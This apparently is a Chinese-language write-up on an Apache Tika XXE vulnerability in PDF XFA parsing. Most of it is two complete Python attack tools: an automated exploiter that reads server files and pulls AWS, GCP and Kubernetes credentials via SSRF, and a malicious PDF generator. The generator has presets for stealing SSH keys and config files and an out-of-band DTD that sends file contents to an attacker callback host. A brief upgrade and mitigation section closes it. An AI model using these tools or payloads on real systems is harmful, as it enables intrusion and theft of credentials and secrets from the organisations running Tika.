影响版本
Apache Tika core (org.apache.tika:tika-core):1.13 - 3.2.1
Apache Tika parsers (org.apache.tika:tika-parsers):1.13 - 1.28.5(即 2.0.0 之前的所有受影响 1.x 版本)
Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module):2.0.0 - 3.2.1
p
#!/usr/bin/env python3
"""
CVE-2025-66516 Automated Exploitation Tool
===========================================
Full-chain exploitation tool for Apache Tika XXE vulnerability.
Automatically generates payloads, tests against target, and extracts data.
VULNERABILITY BACKGROUND:
-------------------------
Apache Tika versions 1.13 through 3.2.1 fail to properly configure the
underlying StAX XML parser to disable external entity resolution when
processing XFA data within PDF documents.
THE INCIDENTAL WOODSTOX PROTECTION:
-----------------------------------
The standard tika-server-standard.jar bundles the Woodstox XML parser,
which has secure defaults and blocks external entity resolution. This
tool is effective against:
- Embedded Tika deployments using JDK's default StAX parser
- Custom deployments without Woodstox on classpath
- Applications explicitly using the JDK reference implementation
USAGE:
------
# Basic file read exploitation
python exploit.py --url http://target:9998 --file /etc/passwd
# Test if target is vulnerable
python exploit.py --url http://target:9998 --check
# AWS metadata theft (SSRF)
python exploit.py --url http://target:9998 --aws-metadata
# Read multiple files
python exploit.py --url http://target:9998 --file /etc/passwd --file /etc/shadow
# Kubernetes secrets extraction
python exploit.py --url http://target:9998 --k8s-secrets
# Save extracted data to file
python exploit.py --url http://target:9998 --file /etc/passwd --save output.txt
"""
import sys
import io
import os
import re
import argparse
import tempfile
try:
import requests
except ImportError:
print("Error: requests library required. Install with: pip install requests")
sys.exit(1)
class TikaExploit:
"""Automated exploitation of CVE-2025-66516"""
def __init__(self, tika_url, timeout=30, verbose=False):
self.tika_url = tika_url.rstrip('/')
self.timeout = timeout
self.verbose = verbose
self.session = requests.Session()
def log(self, message):
"""Print verbose output"""
if self.verbose:
print(f"[DEBUG] {message}")
def check_connectivity(self):
"""Verify Tika server is reachable"""
try:
resp = self.session.get(f"{self.tika_url}/version", timeout=5)
if resp.status_code == 200:
return True, resp.text.strip()
return False, f"HTTP {resp.status_code}"
except requests.RequestException as e:
return False, str(e)
def generate_payload_pdf(self, target):
"""Generate PDF with XXE payload targeting specified file/URL"""
if target.startswith("http://") or target.startswith("https://"):
entity_uri = target
else:
entity_uri = f"file://{target}"
xfa_content = f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY xxe SYSTEM "{entity_uri}">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
<config xmlns="http://www.xfa.org/schema/xci/3.1/">
<present><pdf><version>1.7</version></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
<subform name="form1" layout="tb">
<pageSet><pageArea><contentArea/><medium stock="letter"/></pageArea></pageSet>
<subform>
<field name="data"><ui><textEdit/></ui><value><text>&xxe;</text></value></field>
</subform>
</subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data><form1><data>&xxe;</data></form1></xfa:data>
</xfa:datasets>
</xdp:xdp>'''
# Build minimal PDF
pdf = io.BytesIO()
offsets = {}
def write(data):
if isinstance(data, str):
data = data.encode('utf-8')
pdf.write(data)
def obj_start(num):
offsets[num] = pdf.tell()
write(b'%PDF-1.7\n%\xe2\xe3\xcf\xd3\n')
obj_start(1)
write(b'1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>\nendobj\n')
obj_start(2)
write(b'2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n')
obj_start(3)
write(b'3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\nendobj\n')
obj_start(4)
write(b'4 0 obj\n<< /Length 0 >>\nstream\nendstream\nendobj\n')
obj_start(5)
write(b'5 0 obj\n<< /Fields [] /XFA 6 0 R /NeedAppearances true >>\nendobj\n')
xfa_bytes = xfa_content.encode('utf-8')
obj_start(6)
write(f'6 0 obj\n<< /Length {len(xfa_bytes)} >>\nstream\n'.encode())
write(xfa_bytes)
write(b'\nendstream\nendobj\n')
xref_offset = pdf.tell()
write(b'xref\n0 7\n0000000000 65535 f \n')
for i in range(1, 7):
write(f'{offsets.get(i, 0):010d} 00000 n \n'.encode())
write(f'trailer\n<< /Size 7 /Root 1 0 R >>\nstartxref\n{xref_offset}\n%%EOF\n'.encode())
return pdf.getvalue()
def send_payload(self, pdf_data):
"""Send PDF payload to Tika and return response"""
try:
resp = self.session.put(
f"{self.tika_url}/tika",
data=pdf_data,
headers={"Content-Type": "application/pdf"},
timeout=self.timeout
)
return resp.status_code, resp.text
except requests.RequestException as e:
return None, str(e)
def extract_data(self, response_text, target):
"""Extract exfiltrated data from Tika response"""
# Look for data in XFA form field output
# Tika outputs XFA field data in format: fieldName="data">data: CONTENT</li>
patterns = [
r'fieldName="data">data:\s*(.*?)</li>',
r'<data>(.*?)</data>',
r'<text>(.*?)</text>',
]
for pattern in patterns:
matches = re.findall(pattern, response_text, re.DOTALL)
for match in matches:
content = match.strip()
# Filter out empty or placeholder content
if content and content != "test" and content != "&xxe;":
return content
return None
def exploit_file(self, file_path):
"""Attempt to read a file from target system"""
self.log(f"Generating payload for: {file_path}")
pdf_data = self.generate_payload_pdf(file_path)
self.log(f"Sending {len(pdf_data)} byte payload to {self.tika_url}")
status, response = self.send_payload(pdf_data)
if status is None:
return {"success": False, "error": response}
if status != 200:
return {"success": False, "error": f"HTTP {status}"}
extracted = self.extract_data(response, file_path)
if extracted:
return {"success": True, "data": extracted, "target": file_path}
else:
return {"success": False, "error": "No data extracted (target may be protected by Woodstox)"}
def exploit_ssrf(self, url):
"""Perform SSRF attack"""
self.log(f"Generating SSRF payload for: {url}")
pdf_data = self.generate_payload_pdf(url)
self.log(f"Sending SSRF payload to {self.tika_url}")
status, response = self.send_payload(pdf_data)
if status is None:
return {"success": False, "error": response}
if status != 200:
return {"success": False, "error": f"HTTP {status}"}
extracted = self.extract_data(response, url)
if extracted:
return {"success": True, "data": extracted, "target": url}
else:
return {"success": False, "error": "No data extracted"}
def check_vulnerable(self):
"""
Check if target is vulnerable by attempting to read /etc/passwd
or a non-existent file (to detect error-based information disclosure)
"""
# Try to read /etc/passwd
result = self.exploit_file("/etc/passwd")
if result["success"]:
return True, "Target is VULNERABLE - file read confirmed"
# Try a canary file - if we get a specific error, XXE is working
canary = "/tmp/xxe_test_nonexistent_12345"
pdf_data = self.generate_payload_pdf(canary)
status, response = self.send_payload(pdf_data)
if status == 200:
# Check for error messages indicating XXE processing
if "FileNotFoundException" in response or "No such file" in response:
return True, "Target is VULNERABLE - error-based XXE confirmed"
return False, "Target appears protected (likely using Woodstox)"
def main():
parser = argparse.ArgumentParser(
description='CVE-2025-66516 Automated Exploitation Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --url http://target:9998 --check
%(prog)s --url http://target:9998 --file /etc/passwd
%(prog)s --url http://target:9998 --aws-metadata
%(prog)s --url http://target:9998 --k8s-secrets
%(prog)s --url http://target:9998 --file /etc/passwd --save loot.txt
"""
)
parser.add_argument('--url', '-u', required=True, help='Target Tika server URL')
parser.add_argument('--file', '-f', action='append', help='File to read (can specify multiple)')
parser.add_argument('--ssrf', '-s', action='append', help='URL for SSRF (can specify multiple)')
parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
parser.add_argument('--aws-metadata', action='store_true', help='Attempt AWS metadata extraction')
parser.add_argument('--gcp-metadata', action='store_true', help='Attempt GCP metadata extraction')
parser.add_argument('--k8s-secrets', action='store_true', help='Attempt Kubernetes secrets extraction')
parser.add_argument('--save', help='Save extracted data to file')
parser.add_argument('--timeout', type=int, default=30, help='Request timeout in seconds')
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
args = parser.parse_args()
print("""
+==============================================================+
| CVE-2025-66516 Apache Tika XXE Exploitation Tool |
| For authorized security testing only |
+==============================================================+
""")
exploit = TikaExploit(args.url, timeout=args.timeout, verbose=args.verbose)
# Check connectivity
print(f"[*] Target: {args.url}")
reachable, version = exploit.check_connectivity()
if not reachable:
print(f"[-] Cannot reach target: {version}")
return 1
print(f"[+] Tika version: {version}")
results = []
# Vulnerability check
if args.check:
print("\n[*] Checking vulnerability status...")
vulnerable, message = exploit.check_vulnerable()
if vulnerable:
print(f"[+] {message}")
else:
print(f"[-] {message}")
return 0 if vulnerable else 1
# File read attacks
if args.file:
print(f"\n[*] Attempting to read {len(args.file)} file(s)...")
for file_path in args.file:
print(f"\n[*] Target: {file_path}")
result = exploit.exploit_file(file_path)
if result["success"]:
print(f"[+] SUCCESS - Data extracted:")
print("-" * 50)
print(result["data"][:2000])
if len(result["data"]) > 2000:
print(f"... [{len(result['data']) - 2000} more bytes]")
print("-" * 50)
results.append(result)
else:
print(f"[-] Failed: {result['error']}")
# SSRF attacks
if args.ssrf:
print(f"\n[*] Attempting {len(args.ssrf)} SSRF request(s)...")
for url in args.ssrf:
print(f"\n[*] Target: {url}")
result = exploit.exploit_ssrf(url)
if result["success"]:
print(f"[+] SUCCESS - Response received:")
print("-" * 50)
print(result["data"][:2000])
print("-" * 50)
results.append(result)
else:
print(f"[-] Failed: {result['error']}")
# AWS metadata
if args.aws_metadata:
print("\n[*] Attempting AWS metadata extraction...")
aws_targets = [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://169.254.169.254/latest/dynamic/instance-identity/document",
]
for url in aws_targets:
print(f"\n[*] Target: {url}")
result = exploit.exploit_ssrf(url)
if result["success"]:
print(f"[+] SUCCESS:")
print(result["data"][:1000])
results.append(result)
# If we got IAM role name, try to get credentials
if "iam/security-credentials/" in url and result["data"]:
role_name = result["data"].strip().split('\n')[0]
creds_url = f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}"
print(f"\n[*] Fetching credentials for role: {role_name}")
creds_result = exploit.exploit_ssrf(creds_url)
if creds_result["success"]:
print(f"[+] AWS CREDENTIALS EXTRACTED:")
print(creds_result["data"])
results.append(creds_result)
# GCP metadata
if args.gcp_metadata:
print("\n[*] Attempting GCP metadata extraction...")
gcp_targets = [
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
"http://metadata.google.internal/computeMetadata/v1/project/project-id",
]
for url in gcp_targets:
print(f"\n[*] Target: {url}")
result = exploit.exploit_ssrf(url)
if result["success"]:
print(f"[+] SUCCESS:")
print(result["data"][:1000])
results.append(result)
# Kubernetes secrets
if args.k8s_secrets:
print("\n[*] Attempting Kubernetes secrets extraction...")
k8s_targets = [
"/var/run/secrets/kubernetes.io/serviceaccount/token",
"/var/run/secrets/kubernetes.io/serviceaccount/namespace",
"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
]
for file_path in k8s_targets:
print(f"\n[*] Target: {file_path}")
result = exploit.exploit_file(file_path)
if result["success"]:
print(f"[+] SUCCESS:")
print(result["data"][:1000])
results.append(result)
# Save results
if args.save and results:
print(f"\n[*] Saving results to {args.save}")
with open(args.save, 'w') as f:
for r in results:
f.write(f"=== {r['target']} ===\n")
f.write(r['data'])
f.write("\n\n")
print(f"[+] Saved {len(results)} result(s)")
# Summary
print(f"\n{'='*60}")
if results:
print(f"[+] Exploitation successful: {len(results)} target(s) extracted")
return 0
else:
print("[-] No data extracted - target may be protected by Woodstox")
return 1
if __name__ == "__main__":
sys.exit(main())
生成pdf
#!/usr/bin/env python3
"""
CVE-2025-66516 Malicious PDF Payload Generator
===============================================
Generates PDF documents with embedded XFA (XML Forms Architecture) content
containing XXE (XML External Entity) payloads for exploiting Apache Tika.
VULNERABILITY BACKGROUND:
-------------------------
Apache Tika versions 1.13 through 3.2.1 fail to properly configure the
underlying StAX XML parser to disable external entity resolution when
processing XFA data within PDF documents. This allows attackers to:
- Read arbitrary files from the server
- Perform Server-Side Request Forgery (SSRF)
- Exfiltrate data to external servers
IMPORTANT: The standard tika-server-standard.jar bundles Woodstox, which
has secure defaults and is NOT vulnerable. This exploit works against:
- Embedded Tika deployments (tika-core + parser modules)
- Custom deployments without Woodstox on classpath
- Applications using JDK's default StAX parser
USAGE:
------
# Generate payload to read /etc/passwd
python generate_payload.py --target /etc/passwd --output exploit.pdf
# Generate SSRF payload for AWS metadata
python generate_payload.py --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf
# Generate payload with OOB exfiltration
python generate_payload.py --target /etc/passwd --callback http://attacker.com:8080 --output oob.pdf
# Use attack mode presets
python generate_payload.py --mode aws_metadata --output aws_exploit.pdf
python generate_payload.py --mode k8s_secrets --all-targets --output ./k8s_payloads/
# List available attack modes
python generate_payload.py --list-modes
"""
import sys
import io
import os
import argparse
# Predefined targets for different attack scenarios
ATTACK_PRESETS = {
"file_read": {
"targets": [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/proc/self/environ",
"/proc/self/cmdline",
],
"description": "Read local files from the server"
},
"ssh_keys": {
"targets": [
"/root/.ssh/id_rsa",
"/root/.ssh/id_ed25519",
"/home/ubuntu/.ssh/id_rsa",
"/home/ec2-user/.ssh/id_rsa",
],
"description": "Steal SSH private keys for lateral movement"
},
"aws_metadata": {
"targets": [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://169.254.169.254/latest/dynamic/instance-identity/document",
"http://169.254.169.254/latest/user-data",
],
"description": "Steal AWS EC2 instance metadata and IAM credentials"
},
"gcp_metadata": {
"targets": [
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
"http://metadata.google.internal/computeMetadata/v1/project/project-id",
],
"description": "Steal GCP metadata and service account tokens"
},
"azure_metadata": {
"targets": [
"http://169.254.169.254/metadata/instance?api-version=2021-02-01",
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/",
],
"description": "Steal Azure instance metadata and managed identity tokens"
},
"k8s_secrets": {
"targets": [
"/var/run/secrets/kubernetes.io/serviceaccount/token",
"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
"/var/run/secrets/kubernetes.io/serviceaccount/namespace",
],
"description": "Read Kubernetes service account credentials"
},
"webapp_configs": {
"targets": [
"/var/www/html/wp-config.php",
"/var/www/html/config/database.yml",
"/var/www/html/.env",
"/opt/tomcat/conf/server.xml",
"/opt/tomcat/conf/tomcat-users.xml",
],
"description": "Read common web application configuration files"
},
"ssrf_internal": {
"targets": [
"http://localhost:8080/",
"http://127.0.0.1:6379/INFO",
"http://127.0.0.1:11211/stats",
"http://127.0.0.1:9200/_cluster/health",
],
"description": "Probe internal services via SSRF"
},
}
class PayloadGenerator:
"""Generate PDF documents with XXE payloads in XFA content"""
def __init__(self, target, callback_url=None):
"""
Initialize the payload generator.
Args:
target: File path or URL to read/request
callback_url: Optional URL for OOB exfiltration
"""
self.target = target
self.callback_url = callback_url
def get_entity_uri(self):
"""Determine the correct URI scheme for the target"""
if self.target.startswith("http://") or self.target.startswith("https://"):
return self.target
else:
return f"file://{self.target}"
def generate_xfa_content(self):
"""
Generate complete XFA document with XXE payload.
The XXE entity is defined in the DOCTYPE and referenced in the
template and datasets sections where Tika extracts text content.
"""
entity_uri = self.get_entity_uri()
return f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY xxe SYSTEM "{entity_uri}">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
<config xmlns="http://www.xfa.org/schema/xci/3.1/">
<present><pdf><version>1.7</version></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
<subform name="form1" layout="tb">
<pageSet>
<pageArea><contentArea/><medium stock="letter"/></pageArea>
</pageSet>
<subform>
<field name="data">
<ui><textEdit/></ui>
<value><text>&xxe;</text></value>
</field>
</subform>
</subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data><form1><data>&xxe;</data></form1></xfa:data>
</xfa:datasets>
</xdp:xdp>'''
def generate_oob_xfa_content(self):
"""
Generate XFA content for Out-of-Band (blind) XXE exfiltration.
This technique fetches an external DTD that constructs a URL
containing the file contents, sending data to attacker server.
"""
if not self.callback_url:
raise ValueError("Callback URL required for OOB payload")
return f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY % file SYSTEM "file://{self.target}">
<!ENTITY % dtd SYSTEM "{self.callback_url}/evil.dtd">
%dtd;
%send;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
<subform name="form1">
<pageSet><pageArea><contentArea/><medium stock="letter"/></pageArea></pageSet>
</subform>
</template>
</xdp:xdp>'''
def generate_evil_dtd(self):
"""
Generate the external DTD file for OOB exfiltration.
Host this file on your callback server at /evil.dtd
"""
return f'''<!ENTITY % data SYSTEM "file://{self.target}">
<!ENTITY % param1 "<!ENTITY % send SYSTEM '{self.callback_url}/exfil?d=%data;'>">
%param1;'''
def create_pdf(self, xfa_content):
"""
Create a minimal valid PDF with embedded XFA content.
The PDF structure includes:
- Catalog with AcroForm reference
- Single page
- AcroForm with XFA stream
"""
pdf = io.BytesIO()
offsets = {}
def write(data):
if isinstance(data, str):
data = data.encode('utf-8')
pdf.write(data)
def obj_start(num):
offsets[num] = pdf.tell()
# PDF Header with binary marker
write(b'%PDF-1.7\n%\xe2\xe3\xcf\xd3\n')
# Object 1: Document Catalog
obj_start(1)
write(b'1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>\nendobj\n')
# Object 2: Page Tree
obj_start(2)
write(b'2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n')
# Object 3: Page
obj_start(3)
write(b'3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\nendobj\n')
# Object 4: Empty Page Content
obj_start(4)
write(b'4 0 obj\n<< /Length 0 >>\nstream\nendstream\nendobj\n')
# Object 5: AcroForm with XFA reference
obj_start(5)
write(b'5 0 obj\n<< /Fields [] /XFA 6 0 R /NeedAppearances true >>\nendobj\n')
# Object 6: XFA Stream containing the payload
xfa_bytes = xfa_content.encode('utf-8')
obj_start(6)
write(f'6 0 obj\n<< /Length {len(xfa_bytes)} >>\nstream\n'.encode())
write(xfa_bytes)
write(b'\nendstream\nendobj\n')
# Cross-reference table
xref_offset = pdf.tell()
write(b'xref\n0 7\n')
write(b'0000000000 65535 f \n')
for i in range(1, 7):
write(f'{offsets.get(i, 0):010d} 00000 n \n'.encode())
# Trailer
write(f'trailer\n<< /Size 7 /Root 1 0 R >>\nstartxref\n{xref_offset}\n%%EOF\n'.encode())
return pdf.getvalue()
def save_payload(self, output_path):
"""Generate and save the standard XXE payload PDF"""
xfa_content = self.generate_xfa_content()
pdf_data = self.create_pdf(xfa_content)
with open(output_path, 'wb') as f:
f.write(pdf_data)
return len(pdf_data)
def save_oob_payload(self, output_path):
"""Generate and save the OOB XXE payload PDF and DTD"""
if not self.callback_url:
raise ValueError("Callback URL required for OOB payload")
xfa_content = self.generate_oob_xfa_content()
pdf_data = self.create_pdf(xfa_content)
with open(output_path, 'wb') as f:
f.write(pdf_data)
# Save the evil DTD
dtd_path = output_path.replace('.pdf', '_evil.dtd')
with open(dtd_path, 'w') as f:
f.write(self.generate_evil_dtd())
return len(pdf_data), dtd_path
def list_modes():
"""Display available attack mode presets"""
print("\nAvailable Attack Modes:")
print("=" * 60)
for mode, info in ATTACK_PRESETS.items():
print(f"\n {mode}:")
print(f" {info['description']}")
print(f" Targets ({len(info['targets'])}):")
for t in info['targets'][:3]:
print(f" - {t}")
if len(info['targets']) > 3:
print(f" ... and {len(info['targets']) - 3} more")
def main():
parser = argparse.ArgumentParser(
description='CVE-2025-66516 Malicious PDF Payload Generator',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --target /etc/passwd --output exploit.pdf
%(prog)s --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf
%(prog)s --target /etc/passwd --callback http://attacker:8080 --output oob.pdf
%(prog)s --mode aws_metadata --all-targets --output ./payloads/
%(prog)s --list-modes
"""
)
parser.add_argument('--target', '-t', help='Target file path or URL')
parser.add_argument('--mode', '-m', choices=list(ATTACK_PRESETS.keys()),
help='Use predefined attack mode')
parser.add_argument('--callback', '-c', help='Callback URL for OOB exfiltration')
parser.add_argument('--output', '-o', help='Output file or directory')
parser.add_argument('--all-targets', action='store_true',
help='Generate payloads for all targets in mode')
parser.add_argument('--list-modes', action='store_true', help='List attack modes')
args = parser.parse_args()
if args.list_modes:
list_modes()
return 0
if not args.output:
parser.error("--output is required when generating payloads")
return 1
# Determine targets
if args.mode:
mode_info = ATTACK_PRESETS[args.mode]
if args.all_targets:
targets = mode_info['targets']
else:
targets = [args.target] if args.target else [mode_info['targets'][0]]
print(f"[*] Attack Mode: {args.mode}")
print(f"[*] {mode_info['description']}")
elif args.target:
targets = [args.target]
else:
parser.error("Either --target or --mode is required")
return 1
# Handle output path
if len(targets) > 1 or args.all_targets:
# Multiple targets - output must be directory
os.makedirs(args.output, exist_ok=True)
output_dir = args.output
single_file = False
else:
# Single target - output is file path
output_dir = os.path.dirname(args.output) or '.'
os.makedirs(output_dir, exist_ok=True)
single_file = True
print(f"[*] Generating {len(targets)} payload(s)...")
for i, target in enumerate(targets):
gen = PayloadGenerator(target, args.callback)
if single_file:
output_path = args.output
else:
safe_name = target.replace("/", "_").replace(":", "_").replace("?", "_")[:40]
output_path = os.path.join(output_dir, f"payload_{i}_{safe_name}.pdf")
# Generate standard payload
size = gen.save_payload(output_path)
print(f"[+] Created: {output_path} ({size} bytes)")
print(f" Target: {target}")
# Generate OOB variant if callback specified
if args.callback:
oob_path = output_path.replace('.pdf', '_oob.pdf')
size, dtd_path = gen.save_oob_payload(oob_path)
print(f"[+] Created OOB: {oob_path} ({size} bytes)")
print(f"[+] Created DTD: {dtd_path}")
print(f" Host DTD at: {args.callback}/evil.dtd")
print(f"\n[*] Done. Generated {len(targets)} payload(s).")
return 0
if __name__ == "__main__":
sys.exit(main())
修复建议
升级所有Apache Tika组件至 3.2.2 或更高版本。
注意:该漏洞及其修复均位于 tika-core 中。仅升级 tika-parser-pdf-module、而 tika-core 未升级至 3.2.2 或更高版本的系统仍受漏洞影响。
临时缓解措施(如果无法立即升级):
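- 在应用中禁用XFA解析功能。
- 配置XML解析器,禁用外部实体解析:对 JAXP 解析器可设置 XMLConstants.FEATURE_SECURE_PROCESSING;对 StAX 解析器(本漏洞涉及的解析器类型)应将 XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES 设为 false,并将 XMLInputFactory.SUPPORT_DTD 设为 false。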
- 检测包含可疑XML外部实体声明的PDF文件。
- 过滤包含XFA内容的PDF。